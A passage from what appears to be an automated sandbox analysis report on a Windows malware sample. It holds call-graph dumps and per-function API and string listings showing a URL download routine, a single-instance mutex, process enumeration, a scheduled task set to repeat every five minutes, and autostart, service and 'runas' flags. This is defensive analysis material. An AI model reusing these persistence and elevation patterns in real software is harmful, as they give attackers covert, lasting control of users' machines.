44f26c 59 API calls 3 library calls 45216->45518 45220 4146c2 45217->45220 45221 414796 45217->45221 45222 4147a0 45218->45222 45223 4146f5 45218->45223 45516 413340 59 API calls _memmove 45220->45516 45519 44f26c 59 API calls 3 library calls 45221->45519 45520 44f23e 59 API calls 2 library calls 45222->45520 45235 414707 ___crtGetEnvironmentStringsW 45223->45235 45517 416950 59 API calls 2 library calls 45223->45517 45231 4146e0 45231->44834 45235->44834 45238 40d27d CoInitializeSecurity 45237->45238 45244 40d276 45237->45244 45239 414690 59 API calls 45238->45239 45240 40d2b8 CoCreateInstance 45239->45240 45241 40d2e3 VariantInit VariantInit VariantInit VariantInit 45240->45241 45242 40da3c CoUninitialize 45240->45242 45243 40d38e VariantClear VariantClear VariantClear VariantClear 45241->45243 45242->45244 45245 40d3e2 45243->45245 45246 40d3cc CoUninitialize 45243->45246 45244->44860 45521 40b140 45245->45521 45246->45244 45249 40d3f6 45526 40b1d0 45249->45526 45251 40d422 45252 40d426 CoUninitialize 45251->45252 45253 40d43c 45251->45253 45252->45244 45254 40b140 60 API calls 45253->45254 45256 40d449 45254->45256 45257 40b1d0 SysFreeString 45256->45257 45258 40d471 45257->45258 45259 40d496 CoUninitialize 45258->45259 45260 40d4ac 45258->45260 45259->45244 45262 40b140 60 API calls 45260->45262 45317 40d8cf 45260->45317 45263 40d4d5 45262->45263 45264 40b1d0 SysFreeString 45263->45264 45265 40d4fd 45264->45265 45266 40b140 60 API calls 45265->45266 45265->45317 45267 40d5ae 45266->45267 45268 40b1d0 SysFreeString 45267->45268 45269 40d5d6 45268->45269 45270 40b140 60 API calls 45269->45270 45269->45317 45271 40d679 45270->45271 45272 40b1d0 SysFreeString 45271->45272 45273 40d6a1 45272->45273 45274 40b140 60 API calls 45273->45274 45273->45317 45275 40d6b6 45274->45275 45276 40b1d0 SysFreeString 45275->45276 45277 40d6de 45276->45277 45278 40b140 60 API calls 45277->45278 45277->45317 45279 40d707 45278->45279 45280 40b1d0 SysFreeString 45279->45280 45281 40d72f 45280->45281 45282 40b140 60 API calls 45281->45282 45281->45317 45283 40d744 45282->45283 45284 40b1d0 SysFreeString 45283->45284 45285 40d76c 45284->45285 45285->45317 45530 423aaf GetSystemTimeAsFileTime 45285->45530 45287 40d77d 45532 423551 45287->45532 45292 412c40 59 API calls 45293 40d7b5 45292->45293 45294 412900 60 API calls 45293->45294 45295 40d7c3 45294->45295 45296 40b140 60 API calls 45295->45296 45297 40d7db 45296->45297 45298 40b1d0 SysFreeString 45297->45298 45299 40d7ff 45298->45299 45300 40b140 60 API calls 45299->45300 45299->45317 45301 40d8a3 45300->45301 45302 40b1d0 SysFreeString 45301->45302 45303 40d8cb 45302->45303 45304 40b140 60 API calls 45303->45304 45303->45317 45305 40d8ea 45304->45305 45306 40b1d0 SysFreeString 45305->45306 45307 40d912 45306->45307 45307->45317 45540 40b400 SysAllocString 45307->45540 45309 40d936 VariantInit VariantInit 45310 40b140 60 API calls 45309->45310 45311 40d985 45310->45311 45312 40b1d0 SysFreeString 45311->45312 45313 40d9e7 VariantClear VariantClear VariantClear 45312->45313 45314 40da10 45313->45314 45315 40da46 CoUninitialize 45313->45315 45544 42052a 78 API calls swprintf 45314->45544 45315->45244 45317->45242 45319->44793 45320->44837 45321->44838 45322->44874 45324 420cdd 45323->45324 45332 420c6e 45323->45332 45712 42793d DecodePointer 45324->45712 45326 420ce3 45713 425208 58 API calls __getptd_noexit 45326->45713 45329 420ca1 RtlAllocateHeap 45329->45332 45339 420cd5 45329->45339 45331 420cc9 45710 425208 58 API calls __getptd_noexit 45331->45710 45332->45329 45332->45331 45336 420cc7 45332->45336 45337 420c79 45332->45337 45709 42793d DecodePointer 45332->45709 45711 425208 58 API calls __getptd_noexit 45336->45711 45337->45332 45704 427f51 58 API calls __NMSG_WRITE 45337->45704 45705 427fae 58 API calls 6 library calls 45337->45705 45706 427b0b 45337->45706 45339->44864 45340->44877 45342 415c66 45341->45342 45347 415c1e 45341->45347 45343 415c76 45342->45343 45344 415cff 45342->45344 45351 415c88 ___crtGetEnvironmentStringsW 45343->45351 45718 416950 59 API calls 2 library calls 45343->45718 45719 44f23e 59 API calls 2 library calls 45344->45719 45347->45342 45352 415c45 45347->45352 45351->44881 45354 414690 59 API calls 45352->45354 45355 415c60 45354->45355 45355->44881 45356->44883 45357->44886 45358->44892 45359->44902 45361 413a90 59 API calls 45360->45361 45362 41294c MultiByteToWideChar 45361->45362 45363 418400 59 API calls 45362->45363 45364 41298d 45363->45364 45364->44905 45365->44910 45366->44918 45367->44924 45368->44928 45369->44932 45370->44936 45371->44940 45372->44944 45373->44948 45374->44950 45375->44952 45376->44954 45377->44956 45378->44958 45379->44960 45380->44962 45381->44964 45382->44966 45383->44968 45384->44970 45385->44972 45386->44974 45387->44976 45388->44978 45389->44980 45391 412c71 45390->45391 45392 412c5f 45390->45392 45395 4156d0 59 API calls 45391->45395 45393 4156d0 59 API calls 45392->45393 45394 412c6a 45393->45394 45394->44985 45396 412c8a 45395->45396 45396->44985 45397->44987 45398->45010 45399->45010 45400->45010 45401->44991 45402->44993 45403->44996 45404->44999 45405->45002 45406->45004 45407->45007 45408->45012 45409->45014 45410->45038 45411->45038 45412->45038 45413->45038 45414->45038 45415->45038 45720 41f130 218 API calls _TranslateName 45415->45720 45416->45018 45721 41fd80 64 API calls 45416->45721 45420 415735 45419->45420 45425 4156de 45419->45425 45421 4157bc 45420->45421 45422 41573e 45420->45422 45443 44f23e 59 API calls 2 library calls 45421->45443 45431 415750 ___crtGetEnvironmentStringsW 45422->45431 45442 416760 59 API calls 2 library calls 45422->45442 45425->45420 45429 415704 45425->45429 45432 415709 45429->45432 45433 41571f 45429->45433 45431->45103 45440 413ff0 59 API calls ___crtGetEnvironmentStringsW 45432->45440 45441 413ff0 59 API calls ___crtGetEnvironmentStringsW 45433->45441 45436 41572f 45436->45103 45437 415719 45437->45103 45438->45107 45439->45106 45440->45437 45441->45436 45442->45431 45450 423b4c 45444->45450 45446 41ccca 45449 41a00a 45446->45449 45460 44f1bb 59 API calls 3 library calls 45446->45460 45449->44795 45449->44796 45454 423b54 45450->45454 45451 420c62 _malloc 58 API calls 45451->45454 45452 423b6e 45452->45446 45454->45451 45454->45452 45455 423b72 std::exception::exception 45454->45455 45461 42793d DecodePointer 45454->45461 45462 430eca RaiseException 45455->45462 45457 423b9c 45463 430d91 58 API calls _free 45457->45463 45459 423bae 45459->45446 45461->45454 45462->45457 45463->45459 45465 423b4c 59 API calls 45464->45465 45466 41cc5d 45465->45466 45468 41cc64 45466->45468 45471 44f1bb 59 API calls 3 library calls 45466->45471 45468->45115 45470 41d740 59 API calls 45468->45470 45470->45115 45474->45132 45475->45132 45479 431570 45476->45479 45480 431580 45479->45480 45481 431586 45480->45481 45486 4315ae 45480->45486 45490 425208 58 API calls __getptd_noexit 45481->45490 45483 43158b 45491 4242d2 9 API calls __invalid_parameter_noinfo_noreturn 45483->45491 45487 4315cf wcstoxl 45486->45487 45492 42e883 GetStringTypeW 45486->45492 45489 41a36e lstrcpyW lstrcpyW 45487->45489 45493 425208 58 API calls __getptd_noexit 45487->45493 45489->44829 45490->45483 45491->45489 45492->45486 45493->45489 45495 411cf2 RegOpenKeyExW 45494->45495 45495->45139 45495->45163 45496->45148 45497->45166 45499 420241 45498->45499 45500 4202b6 45498->45500 45503 420266 45499->45503 45508 425208 58 API calls __getptd_noexit 45499->45508 45510 4202c8 60 API calls 3 library calls 45500->45510 45502 4202c3 45502->45186 45503->45186 45505 42024d 45509 4242d2 9 API calls __invalid_parameter_noinfo_noreturn 45505->45509 45507 420258 45507->45186 45508->45505 45509->45507 45510->45502 45511->45212 45512->45213 45513->45201 45516->45231 45517->45235 45518->45221 45519->45222 45522 423b4c 59 API calls 45521->45522 45523 40b164 45522->45523 45524 40b177 SysAllocString 45523->45524 45525 40b194 45523->45525 45524->45525 45525->45249 45527 40b1de 45526->45527 45529 40b202 45526->45529 45528 40b1f5 SysFreeString 45527->45528 45527->45529 45528->45529 45529->45251 45531 423add __aulldiv 45530->45531 45531->45287 45545 43035d 45532->45545 45534 42355a 45536 40d78f 45534->45536 45553 423576 45534->45553 45537 4228e0 45536->45537 45657 42279f 45537->45657 45541 40b423 45540->45541 45542 40b41d 45540->45542 45543 40b42d VariantClear 45541->45543 45542->45309 45543->45309 45544->45317 45586 42501f 58 API calls 4 library calls 45545->45586 45547 430369 45550 43038d 45547->45550 45587 425208 58 API calls __getptd_noexit 45547->45587 45548 430363 45548->45547 45548->45550 45588 428cde 58 API calls 2 library calls 45548->45588 45550->45534 45551 43036e 45551->45534 45554 423591 45553->45554 45555 4235a9 _memset 45553->45555 45597 425208 58 API calls __getptd_noexit 45554->45597 45555->45554 45562 4235c0 45555->45562 45557 423596 45598 4242d2 9 API calls __invalid_parameter_noinfo_noreturn 45557->45598 45559 4235cb 45599 425208 58 API calls __getptd_noexit 45559->45599 45560 4235e9 45589 42fb64 45560->45589 45562->45559 45562->45560 45564 4235ee 45600 42f803 58 API calls __cftof_l 45564->45600 45566 4235f7 45567 4237e5 45566->45567 45601 42f82d 58 API calls __cftof_l 45566->45601 45614 4242fd 8 API calls 2 library calls 45567->45614 45570 423609 45570->45567 45602 42f857 45570->45602 45571 4237ef 45573 42361b 45573->45567 45574 423624 45573->45574 45575 42369b 45574->45575 45577 423637 45574->45577 45612 42f939 58 API calls 4 library calls 45575->45612 45609 42f939 58 API calls 4 library calls 45577->45609 45578 4236a2 45585 4235a0 __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z __allrem 45578->45585 45613 42fbb4 58 API calls 4 library calls 45578->45613 45580 42364f 45580->45585 45610 42fbb4 58 API calls 4 library calls 45580->45610 45583 423668 45583->45585 45611 42f939 58 API calls 4 library calls 45583->45611 45585->45536 45586->45548 45587->45551 45588->45547 45590 42fb70 CallCatchBlock 45589->45590 45591 42fba5 CallCatchBlock 45590->45591 45592 428af7 __lock 58 API calls 45590->45592 45591->45564 45593 42fb80 45592->45593 45594 42fb93 45593->45594 45615 42fe47 45593->45615 45644 42fbab LeaveCriticalSection _doexit 45594->45644 45597->45557 45598->45585 45599->45585 45600->45566 45601->45570 45603 42f861 45602->45603 45604 42f876 45602->45604 45655 425208 58 API calls __getptd_noexit 45603->45655 45604->45573 45606 42f866 45656 4242d2 9 API calls __invalid_parameter_noinfo_noreturn 45606->45656 45608 42f871 45608->45573 45609->45580 45610->45583 45611->45585 45612->45578 45613->45585 45614->45571 45616 42fe53 CallCatchBlock 45615->45616 45617 428af7 __lock 58 API calls 45616->45617 45618 42fe71 __tzset_nolock 45617->45618 45619 42f857 __tzset_nolock 58 API calls 45618->45619 45620 42fe86 45619->45620 45631 42ff25 __tzset_nolock __isindst_nolock 45620->45631 45645 42f803 58 API calls __cftof_l 45620->45645 45623 42fe98 45623->45631 45646 42f82d 58 API calls __cftof_l 45623->45646 45624 42ff71 GetTimeZoneInformation 45624->45631 45627 42feaa 45627->45631 45647 433f99 58 API calls 2 library calls 45627->45647 45628 42ffd8 WideCharToMultiByte 45628->45631 45630 42feb8 45648 441667 78 API calls 3 library calls 45630->45648 45631->45624 45631->45628 45632 430010 WideCharToMultiByte 45631->45632 45637 43ff8e 58 API calls __tzset_nolock 45631->45637 45642 423c2d 61 API calls UnDecorator::getTemplateArgumentList 45631->45642 45643 430157 CallCatchBlock __tzset_nolock __isindst_nolock 45631->45643 45652 4242fd 8 API calls 2 library calls 45631->45652 45653 420bed 58 API calls 2 library calls 45631->45653 45654 4300d7 LeaveCriticalSection _doexit 45631->45654 45632->45631 45635 42ff0c _strlen 45650 428cde 58 API calls 2 library calls 45635->45650 45636 42fed9 ___TypeMatch 45636->45631 45636->45635 45649 420bed 58 API calls 2 library calls 45636->45649 45637->45631 45640 42ff1a _strlen 45640->45631 45651 42c0fd 58 API calls __cftof_l 45640->45651 45642->45631 45643->45594 45644->45591 45645->45623 45646->45627 45647->45630 45648->45636 45649->45635 45650->45640 45651->45631 45652->45631 45653->45631 45654->45631 45655->45606 45656->45608 45684 42019c 45657->45684 45660 4227d4 45692 425208 58 API calls __getptd_noexit 45660->45692 45662 4227d9 45693 4242d2 9 API calls __invalid_parameter_noinfo_noreturn 45662->45693 45663 4227e9 MultiByteToWideChar 45665 422804 GetLastError 45663->45665 45666 422815 45663->45666 45694 4251e7 58 API calls 3 library calls 45665->45694 45695 428cde 58 API calls 2 library calls 45666->45695 45667 40d7a3 45667->45292 45670 422810 45699 420bed 58 API calls 2 library calls 45670->45699 45671 42281d 45671->45670 45672 422825 MultiByteToWideChar 45671->45672 45672->45665 45674 42283f 45672->45674 45696 428cde 58 API calls 2 library calls 45674->45696 45675 4228a0 45700 420bed 58 API calls 2 library calls 45675->45700 45678 42284a 45678->45670 45697 42d51e 88 API calls 3 library calls 45678->45697 45680 422866 45680->45670 45681 42286f WideCharToMultiByte 45680->45681 45681->45670 45682 42288b GetLastError 45681->45682 45698 4251e7 58 API calls 3 library calls 45682->45698 45685 4201ad 45684->45685 45691 4201fa 45684->45691 45701 425007 58 API calls 2 library calls 45685->45701 45687 4201b3 45688 4201da 45687->45688 45702 4245dc 58 API calls 5 library calls 45687->45702 45688->45691 45703 42495e 58 API calls 5 library calls 45688->45703 45691->45660 45691->45663 45692->45662 45693->45667 45694->45670 45695->45671 45696->45678 45697->45680 45698->45670 45699->45675 45700->45667 45701->45687 45702->45688 45703->45691 45704->45337 45705->45337 45714 427ad7 GetModuleHandleExW 45706->45714 45709->45332 45710->45336 45711->45339 45712->45326 45713->45339 45715 427af0 GetProcAddress 45714->45715 45716 427b07 ExitProcess 45714->45716 45715->45716 45717 427b02 45715->45717 45717->45716 45718->45351 45725 427e1a CallCatchBlock 45724->45725 45726 428af7 __lock 51 API calls 45725->45726 45727 427e21 45726->45727 45728 427eda _doexit 45727->45728 45729 427e4f DecodePointer 45727->45729 45744 427f28 45728->45744 45729->45728 45731 427e66 DecodePointer 45729->45731 45737 427e76 45731->45737 45733 427f37 CallCatchBlock 45733->45041 45735 427e83 EncodePointer 45735->45737 45736 427f1f 45738 427b0b _malloc 3 API calls 45736->45738 45737->45728 45737->45735 45739 427e93 DecodePointer EncodePointer 45737->45739 45740 427f28 45738->45740 45742 427ea5 DecodePointer DecodePointer 45739->45742 45741 427f35 45740->45741 45749 428c81 LeaveCriticalSection 45740->45749 45741->45041 45742->45737 45745 427f08 45744->45745 45746 427f2e 45744->45746 45745->45733 45748 428c81 LeaveCriticalSection 45745->45748 45750 428c81 LeaveCriticalSection 45746->45750 45748->45736 45749->45741 45750->45745

                                                                                                                                        Executed Functions

                                                                                                                                        Function 00419F90 Relevance: 176.6, APIs: 65, Strings: 35, Instructions: 1565COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 0040CF10: _memset.LIBCMT ref: 0040CF4A
                                                                                                                                          • Part of subcall function 0040CF10: InternetOpenW.WININET(Microsoft Internet Explorer,00000000,00000000,00000000,00000000), ref: 0040CF5F
                                                                                                                                          • Part of subcall function 0040CF10: InternetOpenUrlW.WININET(00000000,?,00000000,00000000,00000000,00000000), ref: 0040CFA6
                                                                                                                                        • GetCurrentProcess.KERNEL32 ref: 00419FC4
                                                                                                                                        • GetLastError.KERNEL32 ref: 00419FD2
                                                                                                                                        • SetPriorityClass.KERNEL32(00000000,00000080), ref: 00419FDA
                                                                                                                                        • GetLastError.KERNEL32 ref: 00419FE4
                                                                                                                                        • GetModuleFileNameW.KERNEL32(00000000,?,00000400,00000400,?,?,00000000,006BB560,?), ref: 0041A0BB
                                                                                                                                        • PathRemoveFileSpecW.SHLWAPI(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0041A0C2
                                                                                                                                        • GetCommandLineW.KERNEL32(?,?), ref: 0041A161
                                                                                                                                          • Part of subcall function 004124E0: CreateMutexA.KERNEL32(00000000,00000000,{1D6FC66E-D1F3-422C-8A53-C0BBCF3D900D}), ref: 004124FE
                                                                                                                                          • Part of subcall function 004124E0: GetLastError.KERNEL32 ref: 00412509
                                                                                                                                          • Part of subcall function 004124E0: CloseHandle.KERNEL32 ref: 0041251C
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.1240243875.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000002.00000002.1240243875.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.1240243875.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_400000_qJKiVKZdFk.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: ErrorLast$FileInternetOpen$ClassCloseCommandCreateCurrentHandleLineModuleMutexNamePathPriorityProcessRemoveSpec_memset
                                                                                                                                        • String ID: IsNotAutoStart$ IsNotTask$%username%$--Admin$--AutoStart$--ForNetRes$--Service$--Task$<$C:\Program Files (x86)\Google\$C:\Program Files (x86)\Internet Explorer\$C:\Program Files (x86)\Mozilla Firefox\$C:\Program Files\Google\$C:\Program Files\Internet Explorer\$C:\Program Files\Mozilla Firefox\$C:\Windows\$D:\Program Files (x86)\Google\$D:\Program Files (x86)\Internet Explorer\$D:\Program Files (x86)\Mozilla Firefox\$D:\Program Files\Google\$D:\Program Files\Internet Explorer\$D:\Program Files\Mozilla Firefox\$D:\Windows\$F:\$I:\5d2860c89d774.jpg$IsAutoStart$IsTask$X1P$list<T> too long$runas$x*P$x2Q${1D6FC66E-D1F3-422C-8A53-C0BBCF3D900D}${FBB4BCC6-05C7-4ADD-B67B-A98A697323C1}$7P
                                                                                                                                        • API String ID: 2957410896-3144399390
                                                                                                                                        • Opcode ID: d015b84eba4a4434be79b711f18dbc426407edb0061b691a0cb40fbdcb0bdc00
                                                                                                                                        • Instruction ID: ef0c4ad91a93ebed44a25fa424fadbe3f4bc75453965ff7ad5f6b92dd0de7051
                                                                                                                                        • Opcode Fuzzy Hash: d015b84eba4a4434be79b711f18dbc426407edb0061b691a0cb40fbdcb0bdc00
                                                                                                                                        • Instruction Fuzzy Hash: 99D2F670604341ABD710EF21D895BDF77E5BF94308F00492EF48587291EB78AA99CB9B
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Function 0040D240 Relevance: 58.5, APIs: 25, Strings: 8, Instructions: 702comCOMMON
                                                                                                                                        Download Yara Rule

                                                                                                                                        Control-flow Graph

                                                                                                                                        • Executed
                                                                                                                                        • Not Executed
                                                                                                                                        control_flow_graph 688 40d240-40d274 CoInitialize 689 40d276-40d278 688->689 690 40d27d-40d2dd CoInitializeSecurity call 414690 CoCreateInstance 688->690 691 40da8e-40da92 689->691 697 40d2e3-40d3ca VariantInit * 4 VariantClear * 4 690->697 698 40da3c-40da44 CoUninitialize 690->698 693 40da94-40da9c call 422587 691->693 694 40da9f-40dab1 691->694 693->694 704 40d3e2-40d3fe call 40b140 697->704 705 40d3cc-40d3dd CoUninitialize 697->705 700 40da69-40da6d 698->700 702 40da7a-40da8a 700->702 703 40da6f-40da77 call 422587 700->703 702->691 703->702 711 40d400-40d402 704->711 712 40d404 704->712 705->700 713 40d406-40d424 call 40b1d0 711->713 712->713 717 40d426-40d437 CoUninitialize 713->717 718 40d43c-40d451 call 40b140 713->718 717->700 722 40d453-40d455 718->722 723 40d457 718->723 724 40d459-40d494 call 40b1d0 722->724 723->724 730 40d496-40d4a7 CoUninitialize 724->730 731 40d4ac-40d4c2 724->731 730->700 734 40d4c8-40d4dd call 40b140 731->734 735 40da2a-40da37 731->735 739 40d4e3 734->739 740 40d4df-40d4e1 734->740 735->698 741 40d4e5-40d508 call 40b1d0 739->741 740->741 741->735 746 40d50e-40d524 741->746 746->735 748 40d52a-40d542 746->748 748->735 751 40d548-40d55e 748->751 751->735 753 40d564-40d57c 751->753 753->735 756 40d582-40d59b 753->756 756->735 758 40d5a1-40d5b6 call 40b140 756->758 761 40d5b8-40d5ba 758->761 762 40d5bc 758->762 763 40d5be-40d5e1 call 40b1d0 761->763 762->763 763->735 768 40d5e7-40d5fd 763->768 768->735 770 40d603-40d626 768->770 770->735 773 40d62c-40d651 770->773 773->735 776 40d657-40d666 773->776 776->735 778 40d66c-40d681 call 40b140 776->778 781 40d683-40d685 778->781 782 40d687 778->782 783 40d689-40d6a3 call 40b1d0 781->783 782->783 783->735 787 40d6a9-40d6be call 40b140 783->787 790 40d6c0-40d6c2 787->790 791 40d6c4 787->791 792 40d6c6-40d6e0 call 40b1d0 790->792 791->792 792->735 796 40d6e6-40d6f4 792->796 796->735 798 40d6fa-40d70f call 40b140 796->798 801 40d711-40d713 798->801 802 40d715 798->802 803 40d717-40d731 call 40b1d0 801->803 802->803 803->735 807 40d737-40d74c call 40b140 803->807 810 40d752 807->810 811 40d74e-40d750 807->811 812 40d754-40d76e call 40b1d0 810->812 811->812 812->735 816 40d774-40d7ce call 423aaf call 423551 call 4228e0 call 412c40 call 412900 812->816 827 40d7d0 816->827 828 40d7d2-40d7e3 call 40b140 816->828 827->828 831 40d7e5-40d7e7 828->831 832 40d7e9 828->832 833 40d7eb-40d819 call 40b1d0 call 413210 831->833 832->833 833->735 840 40d81f-40d835 833->840 840->735 842 40d83b-40d85e 840->842 842->735 845 40d864-40d889 842->845 845->735 848 40d88f-40d8ab call 40b140 845->848 851 40d8b1 848->851 852 40d8ad-40d8af 848->852 853 40d8b3-40d8cd call 40b1d0 851->853 852->853 857 40d8dd-40d8f2 call 40b140 853->857 858 40d8cf-40d8d8 853->858 862 40d8f4-40d8f6 857->862 863 40d8f8 857->863 858->735 864 40d8fa-40d91d call 40b1d0 862->864 863->864 864->735 869 40d923-40d98d call 40b400 VariantInit * 2 call 40b140 864->869 874 40d993 869->874 875 40d98f-40d991 869->875 876 40d995-40da0e call 40b1d0 VariantClear * 3 874->876 875->876 880 40da10-40da27 call 42052a 876->880 881 40da46-40da67 CoUninitialize 876->881 880->735 881->700
                                                                                                                                        APIs
                                                                                                                                        • CoInitialize.OLE32(00000000), ref: 0040D26C
                                                                                                                                        • CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000006,00000003,00000000,00000000,00000000), ref: 0040D28F
                                                                                                                                        • CoCreateInstance.OLE32(004D506C,00000000,00000001,004D4FEC,?,?,00000000,000000FF), ref: 0040D2D5
                                                                                                                                        • VariantInit.OLEAUT32(?), ref: 0040D2F0
                                                                                                                                        • VariantInit.OLEAUT32(?), ref: 0040D309
                                                                                                                                        • VariantInit.OLEAUT32(?), ref: 0040D322
                                                                                                                                        • VariantInit.OLEAUT32(?), ref: 0040D33B
                                                                                                                                        • VariantClear.OLEAUT32(?), ref: 0040D397
                                                                                                                                        • VariantClear.OLEAUT32(?), ref: 0040D3A4
                                                                                                                                        • VariantClear.OLEAUT32(?), ref: 0040D3B1
                                                                                                                                        • VariantClear.OLEAUT32(?), ref: 0040D3C2
                                                                                                                                        • CoUninitialize.OLE32 ref: 0040D3D5
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.1240243875.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000002.00000002.1240243875.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.1240243875.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_400000_qJKiVKZdFk.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Variant$ClearInit$Initialize$CreateInstanceSecurityUninitialize
                                                                                                                                        • String ID: %Y-%m-%dT%H:%M:%S$--Task$2030-05-02T08:00:00$Author Name$PT5M$RegisterTaskDefinition. Err: %X$Time Trigger Task$Trigger1
                                                                                                                                        • API String ID: 2496729271-1738591096
                                                                                                                                        • Opcode ID: e85d920e4c80818efeaee1da1ba528809e92032e84bc46f79e75b20126437919
                                                                                                                                        • Instruction ID: 4ad9c2e8017b41c765d67f99bb49247a0c13fc41f24acee5688789d455a97b09
                                                                                                                                        • Opcode Fuzzy Hash: e85d920e4c80818efeaee1da1ba528809e92032e84bc46f79e75b20126437919
                                                                                                                                        • Instruction Fuzzy Hash: 05526F70E00219DFDB10DFA8C858FAEBBB4EF49304F1481A9E505BB291DB74AD49CB95
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Function 00412220 Relevance: 36.9, APIs: 16, Strings: 5, Instructions: 116libraryloaderCOMMON
                                                                                                                                        Download Yara Rule

                                                                                                                                        Control-flow Graph

                                                                                                                                        APIs
                                                                                                                                        • GetCommandLineW.KERNEL32 ref: 00412235
                                                                                                                                        • CommandLineToArgvW.SHELL32(00000000,?), ref: 00412240
                                                                                                                                        • PathFindFileNameW.SHLWAPI(00000000), ref: 00412248
                                                                                                                                        • LoadLibraryW.KERNEL32(kernel32.dll), ref: 00412256
                                                                                                                                        • GetProcAddress.KERNEL32(00000000,EnumProcesses), ref: 0041226A
                                                                                                                                        • GetProcAddress.KERNEL32(00000000,EnumProcessModules), ref: 00412275
                                                                                                                                        • GetProcAddress.KERNEL32(00000000,GetModuleBaseNameW), ref: 00412280
                                                                                                                                        • LoadLibraryW.KERNEL32(Psapi.dll), ref: 00412291
                                                                                                                                        • GetProcAddress.KERNEL32(00000000,EnumProcesses), ref: 0041229F
                                                                                                                                        • GetProcAddress.KERNEL32(00000000,EnumProcessModules), ref: 004122AA
                                                                                                                                        • GetProcAddress.KERNEL32(00000000,GetModuleBaseNameW), ref: 004122B5
                                                                                                                                        • K32EnumProcesses.KERNEL32(?,0000A000,?), ref: 004122CD
                                                                                                                                        • OpenProcess.KERNEL32(00000410,00000000,?), ref: 004122FE
                                                                                                                                        • K32EnumProcessModules.KERNEL32(00000000,?,00000004,?), ref: 00412315
                                                                                                                                        • K32GetModuleBaseNameW.KERNEL32(00000000,?,?,00000400), ref: 0041232C
                                                                                                                                        • CloseHandle.KERNEL32(00000000), ref: 00412347
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.1240243875.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000002.00000002.1240243875.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.1240243875.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_400000_qJKiVKZdFk.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: AddressProc$CommandEnumLibraryLineLoadNameProcess$ArgvBaseCloseFileFindHandleModuleModulesOpenPathProcesses
                                                                                                                                        • String ID: EnumProcessModules$EnumProcesses$GetModuleBaseNameW$Psapi.dll$kernel32.dll
                                                                                                                                        • API String ID: 3668891214-3807497772
                                                                                                                                        • Opcode ID: 2e762e749b316a475bae0755eecf3fc9a9c12245de4757d4cc138c5fb7e97d1c
                                                                                                                                        • Instruction ID: 197cd9f83d52dd112842658ec983a676e251e24b3cd7e802a51fbc3a937a58d5
                                                                                                                                        • Opcode Fuzzy Hash: 2e762e749b316a475bae0755eecf3fc9a9c12245de4757d4cc138c5fb7e97d1c
                                                                                                                                        • Instruction Fuzzy Hash: A3315371E0021DAFDB11AFE5DC45EEEBBB8FF45704F04406AF904E2190DA749A418FA5
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Function 0040CF10 Relevance: 16.0, APIs: 6, Strings: 3, Instructions: 228networkfileCOMMON
                                                                                                                                        Download Yara Rule

                                                                                                                                        Control-flow Graph

                                                                                                                                        • Executed
                                                                                                                                        • Not Executed
                                                                                                                                        control_flow_graph 903 40cf10-40cfb0 call 42f7c0 call 42b420 InternetOpenW call 415c10 InternetOpenUrlW 910 40cfb2-40cfb4 903->910 911 40cfb9-40cffb InternetReadFile InternetCloseHandle * 2 call 4156d0 903->911 912 40d213-40d217 910->912 916 40d000-40d01d 911->916 914 40d224-40d236 912->914 915 40d219-40d221 call 422587 912->915 915->914 918 40d023-40d02c 916->918 919 40d01f-40d021 916->919 922 40d030-40d035 918->922 921 40d039-40d069 call 4156d0 call 414300 919->921 928 40d1cb 921->928 929 40d06f-40d08b call 413010 921->929 922->922 924 40d037 922->924 924->921 931 40d1cd-40d1d1 928->931 935 40d0b9-40d0bd 929->935 936 40d08d-40d091 929->936 933 40d1d3-40d1db call 422587 931->933 934 40d1de-40d1f4 931->934 933->934 938 40d201-40d20f 934->938 939 40d1f6-40d1fe call 422587 934->939 944 40d0cd-40d0e1 call 414300 935->944 945 40d0bf-40d0ca call 422587 935->945 941 40d093-40d09b call 422587 936->941 942 40d09e-40d0b4 call 413d40 936->942 938->912 939->938 941->942 942->935 944->928 954 40d0e7-40d149 call 413010 944->954 945->944 957 40d150-40d15a 954->957 958 40d160-40d162 957->958 959 40d15c-40d15e 957->959 961 40d165-40d16a 958->961 960 40d16e-40d18b call 40b650 959->960 965 40d19a-40d19e 960->965 966 40d18d-40d18f 960->966 961->961 962 40d16c 961->962 962->960 965->957 968 40d1a0 965->968 966->965 967 40d191-40d198 966->967 967->965 969 40d1c7-40d1c9 967->969 970 40d1a2-40d1a6 968->970 969->970 971 40d1b3-40d1c5 970->971 972 